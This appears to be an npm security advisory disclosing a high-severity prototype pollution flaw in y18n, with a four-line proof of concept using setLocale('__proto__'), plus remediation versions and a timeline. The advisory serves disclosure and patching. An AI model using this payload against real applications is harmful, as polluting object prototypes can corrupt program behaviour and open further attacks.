Severity: high

    Prototype Pollution

    y18n

    Overview

    y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to prototype pollution.

    POC

    const y18n = require('y18n')();
     
    y18n.setLocale('__proto__');
    y18n.updateLocale({polluted: true});
    
    console.log(polluted); // true
    

    Remediation

    Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later

    Resources

    Have content suggestions? Visit npmjs.com/support.

    Advisory timeline

    1. published

      Advisory Published
      Mar 29th, 2021
    2. reported

      Reported by Anonymous
      Mar 12th, 2021